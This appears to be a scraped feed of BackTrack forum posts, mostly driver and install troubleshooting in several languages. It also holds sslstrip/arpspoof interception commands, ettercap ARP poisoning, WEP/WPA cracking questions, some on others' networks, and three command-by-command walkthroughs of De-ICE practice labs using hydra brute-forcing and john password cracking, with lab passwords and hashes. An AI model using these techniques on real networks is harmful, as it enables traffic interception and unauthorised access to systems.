if that can't be done.i have d-link dwl-2100 ap it acts as repeater also but thing is that you should put the root wep. i need to crack the root acess point wep.using my acess point as repeater then seat near my acess point with dongle connected to laptop.i have permission from my uncle(the root acess point is for my uncle) to do that.i wanna do this for eductianal perpose only. not for illegeal activites so i'm wondering is there a way to do that?
and one thing since d-link is an wirless acess point can i use it instead of usb dongle to crack wep ?i have permisson like i said before. any info would be helpeful. thanks man
i gooogle that and search in fourms too much but can't find answers for those question.
i'm familiar with BT3,BT4 prefinal ,BT4 final,unbunte,ophcrack.
before i finish on bt3 i got pwr in airodump-ng and in bt4 pre final but in bt4 it's zero why?is there anything to do to fix that? i have driver zd1211rw.
-
6:24
»
remote-exploit & backtrack
Salve a tutti. Io ho un acer 6930g con scheda wifi intel 5100agn. Utilizzo backtrack live su USB. Il mio problema è che non riesco a utilizzare nessun WEP Attacks (no-client), quando mando il chopchop o il fragmentation rimangono con la scritta "Read xxxx packets..." (xxxx sta per il numero), e le rare volte che vanno, si bloccano dopo poco e mi compare una lista di possibili cause del problema.... C'è un modo per risolvere il problema? grazie a tutti in anticipo.. ciao
-
4:42
»
remote-exploit & backtrack
Hi..
I hv just installed backtrack4 in virtual box..
I can use internet with bt4..
In win xp i hv a proxy software which always promt me to choose a proxy server(which i hv previously defined.) when i start any internet based application(eg. Telnet,ftp,any internet browser etc.)..
Is there any kind of apps in bt4 which will let me allow to use socks proxy server like the above or nearly above..
-
3:02
»
remote-exploit & backtrack
i have a Compaq Presario CQ6
in Backtrack 4 when i write airmon-ng i do not get an interface
is there a way to solve this problem?
if i buy usb wireless wifi would the problem be solved?
or is it possible to download a driver off the internet?
i am using a CD to start backtrack 4
please help
-
0:48
»
remote-exploit & backtrack
sslstrip is failing when used in a proxy environment. For example, all the clients on LAN use someserver:8080 as their web proxy. I'm starting sslstrip with the following commands:
Code:
iptables -t nat -A PREROUTING -p tcp --destination-port 8080 -j REDIRECT --to-port 10000
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
echo "1" > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 [gateway ip]
sslstrip -w debug.log -k -p -l 10000
Clients hang when trying to use SSL websites. The debug log contains repetitions of:
Quote:
2010-02-04 14:55:47,663 Sending request via HTTP...
2010-02-04 14:55:47,670 Server connection failed.
2010-02-04 14:55:47,670 Retrying via SSL
2010-02-04 14:55:47,674 Server connection failed.
2010-02-04 14:55:47,678 Sending request via HTTP...
2010-02-04 14:55:47,723 Server connection failed.
2010-02-04 14:55:47,723 Retrying via SSL
2010-02-04 14:55:47,729 Server connection failed.
2010-02-04 14:55:47,732 Sending request via HTTP...
2010-02-04 14:55:47,735 Server connection failed.
2010-02-04 14:55:47,735 Retrying via SSL
2010-02-04 14:55:47,814 Sending request via HTTP...
2010-02-04 14:55:47,899 Sending request via HTTP...
2010-02-04 14:55:47,955 Sending request via HTTP...
2010-02-04 14:55:47,964 Sending request via HTTP...
2010-02-04 14:55:47,974 Sending request via HTTP...
2010-02-04 14:55:48,047 Sending request via HTTP...
2010-02-04 14:55:48,059 Sending request via HTTP...
2010-02-04 14:55:48,062 Server connection failed.
2010-02-04 14:55:48,062 Retrying via SSL
2010-02-04 14:55:50,218 Sending request via HTTP...
|
Any ideas what might solve this issue?
-
14:35
»
remote-exploit & backtrack
currenly i have done nothing to my driver but i would like to know if i would need to patch or change my driver for better support with backtrack 4 final i will also be changing the tx power today and if i need to do anything to my driver im curently using rtl8187.injeting works but if i use to attacks at the same time pps decrease.
-
11:38
»
remote-exploit & backtrack
i have a his radeon hd 4830 which i want to set the resolution to 1920 1080 and i currently have backtrack 4 final installed on my hdd. if i run it on a virtual machine i have the option to change it to that resolution, but know installed in my hdd i cant set it that high.
-
11:05
»
remote-exploit & backtrack
First off u wanna hi to all members here on the forum first i have been expirmenting with backtrack 4 final installed on my hdd been testing on my own ap for a few weeks first i satrted with gerix cracker and now im doing the attack through konsole like it much better as i can see what actually going on and could adjust packets being sent to get authencated as well as the sec of keep alive packets delay.i've been getting up to 250 pps injecting out of the box no other configs today i will be putting txpower to 35 and down to 1mb will the driver im currently using support the high power(rtl8187). But which driver would you recomend for me to use for injecting i dont care about going online jus injecting its currently using rtl8187. i have the 1000mw version. is there anything else i can do to improve injection. i have both 5 dbi attena and 9 dbi.
-
8:42
»
remote-exploit & backtrack
Bonjour a tous,
alors voila j'ai un probleme j'ai telecharge la machine virtuelle de Backtrack 4 pour VMware sur le site.
ensuite pour l'installation de Nessus 4.X, dans les tuto ils demandent et font reference a "rpm2tgz" seulement je ne l'ai pas. j"ai cherche partout pour l"installer moi-meme aucune solution trouvee.
Merci de votre aide
a bientot
-
8:07
»
remote-exploit & backtrack
hi. i have 2gb word list for cracking wpa and also i have 1gb ram and i can not copy word list to backtrack home.(im using backtrack from usb flash disk) i want to show word list to aircrack from my hdd (it is hda1) how do i do that. i tried this command
aircrack-ng -a 1 -b (essid) -w /dev/hda1/word.lst essid.cap
also tried
aircrack-ng -a 1 -b (essid) -w /media/hda1/word.lst essid.cap.
and last,
is there any usefull document for airolib-ng
sorry for my english
thanks.
-
6:02
»
remote-exploit & backtrack
Bonjour tout le monde,
je viens d'acheter un Pavillon DV6 et quand j'arrive à la commande "startx" il me met un écran noir pendant même pas une seconde et il m'affiche ça :
X : warning; process set to priority -1 instead of request prioriti 0.
et plus bas :
Xinit : Connection refused (errno111): unable to connect to X server
Xinit : No such process (errno3): Server error.
Merci de m'aider s'il vous plait backtrack me manque :(
Merci d'avance !
-
-
12:47
»
remote-exploit & backtrack
I am using Backtrack 4 and the card I have is a GIGABYTE GN-WI01GT AirCruiser G Mini-PCI-E and for the life of me I cannot get it recognized. I just installed BT4 last night and it was working a minute and I did airmon-ng stop wlan0 and I can't get it back up. I did the command to start /etc/init.d/networking when BT is loaded and I tried to start the NETWORK service. I also tried the following commands.
ifconfig wlan0 up
iwconfig wlan0 up
dhcpcd wlan0 up
/etc/init.d/networking start
/etc/init.d/networking restart
airmon-ng start wlan0
I am using wlan0 because thats what it was before this little mishap. Everytime I try those commands it tells me No Such Device. When I do iwconfig wlan0 isn't even showing up.
Thanks for the help.
Edit: The card uses AR5008 (Chipset AR5416)
Edit #2: Ok I guess I got it working again. I typed: modprobe ath5k then sudo ip link set wlan0 up and it started working again. I don't know if it did it on its own or because that command. Can someone confirm this?
Edit #3: Ok scratch that its not working, but it is showing up.
-
10:26
»
remote-exploit & backtrack
well the problem that i cannot connect to neighborhood wirless even it unsecured network no key needs, but i cannot connect and good signal? is there any trick using backtrackk and thx ya
-
10:26
»
remote-exploit & backtrack
well the problem that i cannot connect to neighborhood wirless even it unsecured network no key needs, but i cannot connect and good signal? is there any trick using backtrackk and thx ya
-
9:44
»
remote-exploit & backtrack
Este método para obtener una instalación en una unidad USB, es la más simple disponible utilizando Unetbootin. Tenga en cuenta que vamos a formatear el dispositivo USB y borrar su contenido.
1. Conecta tu USB Drive (con mínima capacidad de 2 GB)
2. Formatear la unidad USB a FAT32
3. Descargar Unetbootin de
UNetbootin - Homepage and Downloads
4. Iniciar Unetbootin DiskImage y seleccionar (utilizar BackTrack-ISO final)
5. Seleccione la unidad USB y haga click en "OK" para crear una unidad de arranque USB BackTrack
6. Acceda a BackTrack con el usuario y la contraseña de root / toor

fuente:
USB Live
-
8:37
»
remote-exploit & backtrack
Este método de instalación es el más sencillo posible. El supuesto es que se tiene una instalación de Windows para ocupar todo el espacio en el disco, y que le gustaría cambiar el tamaño y crear particiones en el disco para permitir instalar BackTrack junto con Windows. PRIMERO RESPALDE LA INSTALACION DE WINDOWS.
1. Bootear BackTrack en la máquina a instalar. Una vez arrancado, tipee "startx" para llegar a la interfaz gráfica de KDE.
2. Haga doble click en "install.sh" script en el escritorio, o ejecute el comando "ubiquity" en la consola.
3. Seleccione su ubicación geográfica y haga clic en "forward". Lo mismo para el teclado.
4. La pantalla siguiente le permite configurar el esquema de particionado. El supuesto es que estamos cambiando el tamaño de la partición de Windows 7 y la instalación de BackTrack en el espacio que ha hecho.
5. Acepte el sumario de la instalación y el cliente "Install". Permitir la instalación para ejecutar y terminar. Reinicie cuando haya terminado.
6. Grub debe permitir arrancar tanto en BackTrack como en Windows.
7. Acceda a BackTrack con el usuario y la contraseña de root / toor. Cambiar la contraseña de root("passwd").
8. Arregle el despliegue de inicio escribiendo "fix-splash" (o "fix-splash800" si usted desea un 800 × 600 framebuffer), reiniciar el sistema.
fuente:
Dual Boot
-
8:27
»
remote-exploit & backtrack
Este método de instalación es el más sencillo posible. El supuesto es que todo el disco duro todo va a ser utilizado para BackTrack.
1. Bootear BackTrack en la máquina a instalar. Una vez arrancado, tipee "startx" para llegar a la interfaz gráfica de KDE.
2. Haga doble click en "install.sh" script en el escritorio, o ejecute el comando "ubiquity" en la consola.
3. Seleccione su ubicación geográfica y haga click en "forward". Lo mismo para el teclado.
4. La siguiente pantalla le permite configurar el esquema de particionado. El supuesto es que estamos borrando toda la unidad e instalando BackTrack en ella.
5. Acepte el sumario de la instalación y el cliente "Install". Permitir la instalación para ejecutar y terminar. Reinicie cuando haya terminado.
6. Acceda a BackTrack con el usuario y la contraseña de root / toor. Cambiar la contraseña de root ("passwd").
7. Arregle el despliegue de inicio escribiendo "fix-splash" (o "fix-splash800" si usted desea un 800 × 600 framebuffer), reiniciar el sistema.
fuente:
Hard Drive Install
-
7:12
»
remote-exploit & backtrack
Hi all,
i was getting tired of manually updating software by hand so i made this update script...
you may need to customize it here and there for your needs.
Please let me know what you think about it or have more to add to it.
Quote:
#!/bin/sh
#
# Avoid using root's TMPDIR
unset TMPDIR
Nessusplugins() {
read -p "Update Nessus Daemon? <y/n> "
if [ "$REPLY" = "y" ];then
echo ---------------------------------------------
echo Nessus Plugins
echo
KIND="Nessus Server"
echo -n $"Shutting down $KIND: "
test -f /opt/nessus/var/nessus/nessus-service.pid && kill `cat /opt/nessus/var/nessus/nessus-service.pid`
RETVAL=$?
sleep 4
if [ "$RETVAL" == "0" ]; then
rm -f /var/lock/subsys/nessusd
echo services stopped successfully
else
echo services were not running...
fi
echo
echo -n "Updating $KIND plugins: "
/opt/nessus/sbin/nessus-update-plugins
echo $KIND plugins updated successfully
echo -n $"Starting $KIND services: "
/opt/nessus/sbin/nessus-service -D -a 127.0.0.1 --ipv4-only
echo $KIND services started...
echo
echo ---------------------------------------------
sleep 2
else
cancel
fi
}
Openvasplugins() {
read -p "Update Openvas Daemon? <y/n> "
if [ "$REPLY" = "y" ];then
echo ---------------------------------------------
echo Openvas Plugins
echo
KIND="Openvas"
echo -n $"Shutting down $KIND services: "
test -f /opt/openvas/var/openvas/openvas-service.pid && kill `cat /opt/openvas/var/openvas/openvas-service.pid`
RETVAL=$?
sleep 4
if [ "$RETVAL" == "0" ]; then
rm -f /var/lock/subsys/openvasd
echo services stopped successfully
else
echo services were not running...
fi
echo -n "Updating $Kind plugins: "
/opt/openvas/sbin/openvas-nvt-sync
echo $Kind plugins updated successfully
echo -n $"Starting $KIND services: "
/opt/openvas/sbin/openvasd -D -a 127.0.0.1 -p 1242
echo $KIND services started...
RETVAL=0
echo
[ $RETVAL -eq 0 ] && touch /var/lock/subsys/openvasd
return $RETVAL
return 0
echo
echo ---------------------------------------------
sleep 2
else
cancel
fi
}
Saint() {
echo ---------------------------------------------
echo Saint Exploit
echo
KIND="Saint Exploit"
echo -n "Updating $Kind plugins: "
cd /opt/saint-7.2/
saint -VV
echo $Kind plugins updated successfully
echo
echo ---------------------------------------------
sleep 2
}
Nikto() {
echo ---------------------------------------------
echo Nikto
echo
KIND="Nikto"
echo -n "Updating $KIND plugins: "
nikto.pl -update
echo $KIND plugins updated successfully
echo
echo ---------------------------------------------
sleep 2
}
Amap() {
echo ---------------------------------------------
echo
echo Amap
echo
KIND="Amap"
echo Current version:
amap | grep amap | cut -d" " -f2,1 | tr ['Syntax: amap is /u r loc l b'] ' '
echo -n "Updating $KIND plugins: "
amap -W
echo $KIND plugins updated successfully
echo
echo ---------------------------------------------
sleep 2
}
Sqlmap() {
echo ---------------------------------------------
echo
echo Sqlmap
echo
KIND="Sqlmap"
echo -n "Updating $KIND plugins: "
python /pentest/database/sqlmap/sqlmap.py --update
echo $KIND plugins updated successfully
echo
echo ---------------------------------------------
sleep 2
}
Aircrackng() {
echo ---------------------------------------------
echo Aircrack-NG
echo
KIND="Aircrack-NG"
echo Current version:
echo
aircrack-ng | grep Aircrack-ng | cut -d"T" -f0,1 | tr ['tom'] ' '
echo
echo -n "Updating $KIND: "
echo
cd /pentest/wireless/
update-aircrack.sh
airodump-ng-oui-update
echo $KIND plugins updated successfully
echo
echo ---------------------------------------------
sleep 2
}
Rkhunter() {
echo ---------------------------------------------
echo Rootkit Hunter
echo
KIND="Rootkit Hunter"
echo Current version:
echo
rkhunter -V | grep Rootkit | cut -d"C" -f1,0 | tr [','] ' '
echo
echo -n "Updating $KIND database: "
rkhunter --update
echo $KIND plugins updated successfully
echo
echo ---------------------------------------------
sleep 2
}
Metasploit2() {
echo ---------------------------------------------
echo Framework Metasploit 2
echo
KIND="Metasploit 2"
echo Current version:
echo
cd /pentest/exploits/framework2
msfconsole -v
msfcli -v
echo -n "Updating $KIND plugins: "
cd /pentest/exploits/framework2/
svn update
echo $KIND plugins updated successfully
echo
echo ---------------------------------------------
sleep 2
}
Metasploit3() {
echo ---------------------------------------------
echo Framework Metasploit 3
echo
KIND="Metasploit 3"
echo Current version:
cd /pentest/exploits/framework3
msfconsole -v
echo
echo -n "Updating $KIND plugins: "
cd /pentest/exploits/framework3/
svn update
echo $KIND plugins updated successfully
echo
echo ---------------------------------------------
sleep 2
}
Milworm() {
echo ---------------------------------------------
echo Milw0rm Exploits
echo
KIND="Milworm exploits"
echo -n "Updating $KIND plugins: "
echo
cd /pentest/exploits/
update-milw0rm
echo $KIND plugins updated successfully
echo
echo ---------------------------------------------
sleep 2
}
Exploitdb() {
echo ---------------------------------------------
echo The Exploit Database
echo
KIND="The Exploit Database"
echo -n "Updating $KIND plugins: "
echo
cd /pentest/exploits/
svn co svn://devel.offensive-security.com/exploitdb
echo $KIND plugins updated successfully
echo
echo ---------------------------------------------
sleep 2
}
Pirana() {
echo ---------------------------------------------
echo Pirana Exploits "metasploit database"
echo
KIND="Pirana exploits"
echo Current version:
echo
cd /pentest/fuzzers/pirana/framework-2.5/
msfconsole -v
msfcli -v
echo -n "Updating $KIND: "
echo
svn update
echo $KIND plugins updated successfully
echo
echo ---------------------------------------------
sleep 2
}
all() {
Nessusplugins
Openvasplugins
Saint
Nikto
Amap
Sqlmap
Aircrackng
Rkhunter
Metasploit2
Metasploit3
Milworm
Exploitdb
Pirana
}
case "$1" in
Nessus)
Nessusplugins
;;
Openvas)
Openvasplugins
;;
Saint)
Saint
;;
Nikto)
Nikto
;;
Amap)
Amap
;;
Sqlmap)
Sqlmap
;;
Aircrackng)
Aircrackng
;;
Rkhunter)
Rkhunter
;;
Metasploit2)
Metasploit2
;;
Metasploit3)
Metasploit3
;;
Milworm)
Milworm
;;
Exploitdb)
Exploitdb
;;
Pirana)
Pirana
;;
all)
all
;; *)
echo "Usage: rc.updates {Nessus|Openvas|Saint|Nikto|Amap|Sqlmap|Aircrackng |Rkhunter|Metasploit2|Metasploit3|Milworm|Exploitd b|Pirana|all)"
exit 1
esac
exit $?
|
-
3:59
»
remote-exploit & backtrack
Bonjour,
Je dois brancher un PC à un videoprojecteur. J'aimerais savoir comment configurer BackTrack 4.0 pour qu'il puisse balancer l'image sur le videoprojecteur ?
Merci
-
-
19:39
»
remote-exploit & backtrack
I recently purchased a new laptop with an Atheros AR9285 802.11b/g/n wireless card. I'm having a bit of trouble getting monitor mode / promiscuous mode working in wireshark.
First, I checked that it should be supported. I'm fairly certain monitor mode should work with this card using the ath9k driver.
Here are steps I have taken and results:
/usr/bin/start-network <- start it so I can use wicd
WICD - can connect to network no problem, using WPA
In wireshark, I can see a couple of things.
1. I can view a ton of management / beacon frames. Not really interested in these.
2. I can view traffic from local PC when connected to my network
3. I cannot view other traffic, even though I have promiscous mode checked in Wireshark.
I tried manually setting the card to monitor mode
ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up
iwconfig <- shows it is indeed in monitor mode
With it manually set, Wicd manager does not show anything, so I cannot connect to my own network. In wireshark (prom. mode still set)
1. Can see plenty of beacon frames still.
2. Cannot view my local PC traffic, obviously, as I am not connected to a network and cannot generate any.
3. Still cannot view any other traffic from other PCs. (Yes, I have another laptop and am generating traffic, so I know it exists)
Next, I thought it must be a driver issue, although I don't think any of the following changed anything (up until now, using default BackTrack 4 Final drivers - is it using ath9k ? Seems like it was). So, I proceeded to install latest driver...
1. downloaded driver compat-wireless.2.6.tar.bz2
2. extracted, make, make install
3. make unload (unload current modules, BT4 shows ath9k unloaded, so I assume it used that by default so reinstalling probably didn't do anything)
4. modprobe ath9k (start up ath9k module, which should work for AR9285)
After doing that, nothing changed. Same results as before. Does anyone have any ideas for my next step? ath9k says all supported devices (which should include AR9285) should work in monitor mode, but it just isn't working for me. I'm able to put it into monitor mode, and Wireshark doesn't complain (in Windows, Wireshark tells me it failed to put device in promiscuous mode), but I just don't see the results...
-
18:36
»
remote-exploit & backtrack
trying to use the ettercap for my wireless card instead of the RJ-45 port. My wireless card is set to eth1. RJ-45 port is eth0. I typed in ettercap -T -q -M ARP // // eth1. And even tried ettercap -T -q -M ARP // // eth0. the RJ-port works fine and I can poison my network. I just need it to be wireless instead of running a cord everywhere.
Plz HELP!
Thanks,
Jon
-
18:06
»
remote-exploit & backtrack
Hi,
I've tried both of this wireless cards and none of them can be recognized by backtrack 4 final version it simply can not be found by system, but when I open in system settings section cales PCI the card is there listed among other pci or agp card. Does anybody know is there driver that supports these card or just one of these cards. I have very good separate directional antena
D-Link ANT24-1200 for d-link card DWL- G520+. I also want to know does any of this PCI wireless card support wireless injection.Thank you very much.
-
-
6:30
»
remote-exploit & backtrack
Hello i have one question.How can i check length of password or encryption wpa/wep/64/128/256bit.Tnx:confused:
-
3:41
»
remote-exploit & backtrack
hey,
I try for a long time to break the wep key, but the iv's go so slow, and i try to folow the tutorial in aircrack-ng web site under this title:
"i_am_injecting_but_the_ivs_don_t_increase"
but it's not help me at all
i understand that i need to fake AP or something like that with wpa_supplicant (even that the netwok is wep key)
i'm using BT4 final from cd
my card it's iwl3945 (i saw that more people have this problem with this card)
please help me.
thanks.
-
-
15:23
»
remote-exploit & backtrack
I am looking to get a new laptop for backtrack..I am fine with the basic hardware specs of this (ram, hd space, etc) but I do have some questions i hope you can answer...
http:[slash][slash]www[dot]walmart[dot]com/ip/HP-14.1-500GB-dv4-2049wm/12347227]Walmart.com: HP 14.1" Pavilion dv4-2049wm Entertainment Laptop PC with AMD Turion II Ultra Dual-Core Processor & Windows 7 Home Premium: Computers
here is the page from walmart. I mainly want to know if it supports usb boot in bios and how it runs on backtrack. Anyone have experience with this...?:confused:
-
13:15
»
remote-exploit & backtrack
Links
Watch video on-line: De-ICE v2.0 (1.100)
Download video: g0tmi1k - De-ICE v2.0 (1.100) [HD].mp4 - de-ice,g0tmi1k
Commands:
Bash pastebin - collaborative debugging tool
What is this?
This is my walk though of how I broke into the De-ICE.net network, level 2, disk 1.
The De-ICE.net network is on a "live PenTest CD", that creates a target(s) on which to practise penetration testing; it has an "end goal" to reach.
What do I need?
> BackTrack 4 (Final)
> de-ice.net-2.100-1.1.iso (MD5: 09798f85bf54a666fbab947300f38163)
> Dictionary(s)
Software
Name:
De-ICE.net
Version: 2.0
(Level 1 - Disk 2 - IP Address: 1.100)
Home Page:
http://www.de-ice.net or
Heorot.net » De-ICE PenTest LiveCDs Project
Download Link:
Forums/Support:
http://forums.heorot.net and
Heorot.net • Login
WiKi/Support:
De-ICE.net PenTest Disks - Hackerpedia
Commands:
Code:
nmap -n 192.168.2.1-255
nmap -n -sV -sS -O 192.168.2.100
nmap -n -sV -sS -O 192.168.2.101
firefox 192.168.2.100
[+]kate -> list of possible usernames. Save. Filename: usernames.txt
firefox 192.168.2.101
[+]BackTrack -> Vulnerability Identification -> Fuzzers -> JBroFuzz. Web Directories -> List of usernames (+ root, admin) with '~' infront. -> http://192.168.2.101 -> 80
firefox http://192.168.2.101/~pirrip
[+]kate -> Update usernames with the ones which we got a respond from. Save.
[+]BackTrck -> Web Application Analysis -> Web (frontend) -> nikto2
./nikto.pl -host 192.168.2.101 -r ~pirrip/ -Display 124
firefox http://192.168.2.101/~pirrip/.ssh
// Save both files
mv /root/id_rsa /http://root/.ssh/id_rsa
mv /root/id_rsa.pub /http://root/.ssh/id_rsa.pub
chmod 000 /http://root/.ssh/id_rsa
chmod 000 /http://root/.ssh/id_rsa.pub
ssh pirrip@192.168.2.100
// Yes
mailx
// 3 - we see that havisham passowrd is 'changeme'. 7 - we seen pirrip password is '0l1v3rTw1st'
cd /etc/
vi passwd
// kate -> Update usernames with only valid ones.
vi group
sudo vi shadow
// edit (D, :22,22y, :put, i, root, ESCape, ESCape, d + [->],[up],d d). Save it (:w), exit (:q). Password: 0l1v3rTw1st
su
// Password: 0l1v3rTw1st
cd /root/
ls -a
cd .save/
ls -a
chmod -R 777 /root/
//In BackTrack//
scp pirrip@192.168.2.100:/root/.save/great_expectations.zip /root/
unzip great_expectations.zip
tar xf great_expectations.tar
strings Jan08
//In SSH//
sudo iv /var/mail/havisham
modprobe capability
//In BackTrack//
ftp 192.168.2.100
// Usrename: pirri. Password: 0l1v3rTw1st //
ls -a
//In SSH//
exit
//In BackTrack//
[+]Firefox -> Send a REAL email to: philip.pirrip.ge@gmail.com
// GAME OVER
----------------------------------------------------------------------------------------------------
Users
root:P1ckw1ckP@p3rs root:$1$/Ta1Q0lT$CSY9sjWR33Re2h5ohV4MX/:13882:0:::::
havisham:changeme havisham:$1$qbY1hmdT$sVZn89wKvmLn0wP2JnZay1:13882:0:99999:7:::
pirrip:0l1v3rTw1st pirrip:$1$KEj04HbT$ZTn.iEtQHcLQc6MjrG/Ig/:13882:0:99999:7:::
magwitch: magwitch:$1$qG7/dIbT$HtTD946DE3ITkbrCINQvJ0:13882:0:99999:7:::
----------------------------------------------------------------------------------------------------
Notes:
Video length: 09:07
Capture length: 30:35
Song: Ashley Wallbridge - Masquerade (Original Mix)
Blog Post:
g0tmi1k: [Video] De-ICE.net v2.0 (1.100) {Level 2 - Disk 1}
Forum Post:
~g0tmi1k
-
13:13
»
remote-exploit & backtrack
Links
Watch video on-line: De-ICE v1.1 (1.00)
Download video: g0tmi1k - De-ICE v1.1 (1.100) [HD].mp4 - de-ice,g0tmi1k
Commands:
Bash pastebin - collaborative debugging tool
What is this?
This is my walk though of how I broke into the De-ICE.net network, level 1, disk 2.
The De-ICE.net network is on a "live PenTest CD", that creates a target(s) on which to practise penetration testing; it has an "end goal" to reach.
What do I need?
> BackTrack 4 (Final)
> de-ice.net-1.110-1.1.iso (MD5: a3341316ca9860b3a0acb06bdc58bbc1)
> Dictionary(s)
Software
Name:
De-ICE.net
Version: 1.1
(Level 1 - Disk 2 - IP Address: 1.100)
Home Page:
http://www.de-ice.net or
Heorot.net » De-ICE PenTest LiveCDs Project
Download Link:
Forums/Support:
http://forums.heorot.net and
Heorot.net • Login
WiKi/Support:
De-ICE.net PenTest Disks - Hackerpedia
Commands:
Code:
nmap -n 192.168.1.1-255
nmap -n -sS -sV -O 192.168.1.100
firefox 192.168.1.100
[+]kate -> make list of possible usernames. Save. Filename: usernames
// lastF, fLast
hydra 192.168.1.100 ssh2 -L /root/usernames -p password -e s
ssh bbanter@192.168.1.100
// "Yes" if quiz about trusting authenticity. Password: bbanter
cd /etc/
cat passwd
[+]kate -> Update usernames. Save.
cat group
exit
cd /root/tools/dictionary/
cat common-1 common-2 common-3 common-4 wordlist.txt >> /root/passwords
hydra 192.168.1.100 ssh2 -V -l aadams -P /root/passwords
ssh aadams@192.168.1.100
// Password: nostradamus
cd /etc/
sudo cat shadow
// Password: nostradamus
[+]kate -> New -> Paste -> Save. Filename: shadow
exit
john
./john --rules --wordlist=/root/passwords --users=root /root/shadow
// Password: tarot
ssh aadams@192.168.1.100
// Password: nostradamus
su
// Password: tarot
ls -a
cd ..
ls -a
cd ftp
/
ls -a
cd incoming/
ls -a
openssl enc -d -aes-128-cbc -in salary_dec2003.csv.enc -out salary.csv -k tarot
cd /etc/
vi vsftpd.conf
// edit (by pressing i) vsftpd.conf to have a '#' in front of 'listen=YES' (last line). Then save it (:w), and exit (:quit)
modprobe capability
exit
exit
ftp 192.168.1.100
// User: root. Password: tarot
ls -a
cd ..
ls -a
cd home
ls -a
cd ftp
ls -a
cd incoming
ls -a
get salary.csv
cd /pentest/passwords/jtr
ls
mv salary.csv ~
[+]kate -> salary.csv
// GAME OVER
----------------------------------------------------------------------------------------------------
Users
root:tarot = root:$1$TOi0HE5n$j3obHaAlUdMbHQnJ4Y5Dq0:13553:0:::::
aadams:nostradamus = aadams:$1$6cP/ya8m$2CNF8mE.ONyQipxlwjp8P1:13550:0:99999:7:::
bbanter:bbanter = bbanter:$1$hl312g8m$Cf9v9OoRN062STzYiWDTh1:13550:0:99999:7:::
ccoffee:hierophant = ccoffee:$1$nsHnABm3$OHraCR9ro.idCMtEiFPPA.:13550:0:99999:7:::
----------------------------------------------------------------------------------------------------
Notes:
Video length: 04:11
Capture length: 08:52
Song: Eryka Badu & Ziggy Marley - I Luv U (Dubstep Mix)
Blog Post:
g0tmi1k: [Video] De-ICE.net v1.1 (1.100) {Level 1 - Disk 2}
Forum Post:
~g0tmi1k
-
13:08
»
remote-exploit & backtrack
Links
Watch video on-line: De-ICE v1.0 (1.110)
Download video: g0tmi1k - De-ICE v1.0 (1.110) [HD].mp4 - de-ice,g0tmi1k
Commands:
Bash pastebin - collaborative debugging tool
What is this?
This is my walk though of how I broke into the De-ICE.net network, level 1, disk 1.
The De-ICE.net network is on a "live PenTest CD", that creates a target(s) on which to practise penetration testing; it has an "end goal" to reach.
What do I need?
> BackTrack 4 (Final)
> de-ice.net-1.110-1.0.iso (MD5: a626d884148c63bfc9df36f2743d7242)
> Dictionary(s)
Software
Name:
De-ICE.net
Version: 1.0
(Level 1 - Disk 1 - IP Address: 1.110)
Home Page:
http://www.de-ice.net or
Heorot.net » De-ICE PenTest LiveCDs Project
Download Link:
Forums/Support:
http://forums.heorot.net and
Heorot.net • Login
WiKi/Support:
De-ICE.net PenTest Disks - Hackerpedia
Commands:
Code:
nmap -n 192.168.1.1-255
nmap -n -sS -sV -O 192.168.1.110
firefox 192.168.1.110
[+]kate -> make list of possible usernames
// lastF, fLast
ftp 192.168.1.110
// Username: anonymous. Password: [Blank]
ls -a
cd download
ls -a
cd etc
ls -a
get core
exit
strings core
[+]Copy from 'root:$...' to '[EOF]'. Kate -> New -> Paste. Format so each username is one its own line -> Save. Filename: shadow
cd tools/dictionary/
cat common-1 common-2 common-3 common-4 wordlist.txt >> /root/passwords
john
./john --rules --wordlist=/root/passwords /root/shadow
//Password: root:Complexity & ccofee:Diatomaceous
ssh ccofee@192.168.1.110
//Password: Diatomaceous
ls -a
cd ..
ls -a
cd root/
ls -a
cd .save/
su
//Password: Complexity
cd .save/
ls -a
cat copy.sh
openssl enc -d -aes-256-cbc -salt -in customer_account.csv.enc -out customer_account.csv -pass file:/etc/ssl/certs/pw
ls -a
cat customer_account.csv
// GAME OVER
----------------------------------------------------------------------------------------------------
Users
root:Complexity = root:$1$aQo/FOTu$rriwTq.pGmN3OhFe75yd30:13574:0:::::
aadams: = aadams:$1$klZ09iws$fQDiqXfQXBErilgdRyogn.:13570:0:99999:7:::
bbanter:Zymurgy = bbanter:$1$1wY0b2Bt$Q6cLev2TG9eH9iIaTuFKy1:13571:0:99999:7:::
ccoffee:Diatomaceous = ccoffee:$1$6yf/SuEu$EZ1TWxFMHE0pDXCCMQu70/:13574:0:99999:7:::
----------------------------------------------------------------------------------------------------
Notes:
Video length: 06:57
Capture length: 18:17
Song: Aly & Fila - Khepera
Blog Post:
g0tmi1k: [Video] De-ICE.net v1.0 (1.110) {Level 1 - Disk 1}
Forum Post:
~g0tmi1k
-
10:52
»
remote-exploit & backtrack
Hi,
I'm thinking about installing BT4 on my eee pc.
My problem is that that I have 2GB of HD and 4GB of SD.
How can I partition all to fit BT4 final?
Thanks
-
3:46
»
remote-exploit & backtrack
HI!GUYS!
How to set up an IP address in FAST-TRACK (or backtrack) to let vulnerable machine reverse to connect it, I have used backtrack in VM , network is NET, so the IP address of backtrack is a LAN IP address, when the fast-track discovered a vulnerable machine, what it reverse-connected was LAN IP address!I want to use socks5 proxy to accept the date of backlink , how can I set up
an IP address which can provide the reverse connection in the fast-track?
PS:
1,How to set up a global socks5 proxy and multi-level proxy through DANTE ? Now I have an SSH host, how to do it?
2,I have a VM host with 192.168.30.128 , using the WIN2000 system. I would like to use FAST-TRACK autopwn module to test it, but my backtrack IP is 192.168.30.129, I want it to connect back to my backtrack, IP address is WANIPof my host.I use SSH to connect my host to be the SOCKS5 proxy.
3,So I try to add a new network card in the VM virtual machine, and set up it to be a static WAN IP address. The IP address of NIC 2 is still the DHCP's,and then we do port mapping in the virtual machine
As a result, when I try to detect it,the reverse connection is always pointing to my LAN IP address
4、I tried a VPN connection, but i still can not find it!And it still connects back to my LAN IP address.
5、I think it should be no less complex, if you can set up a shared IP address through the backtrack so that all software can choose it?
Look forward to your answer,Thanks
-
3:15
»
remote-exploit & backtrack
Buongiorno a tutti!!! Voglio testare la sicurezza della mia rete wireless ho usato bt3 ho un errore "fixed channel rausb0" mi esce questo e poi non compare il mac address solo il bssis... l adattatore è un DWL-G122C..qualcuno mi potrebbe aiutare?...grazie!!!
-
3:06
»
remote-exploit & backtrack
Salve a tutti uso backtrack da poco e ho un problema con la jdk di java.
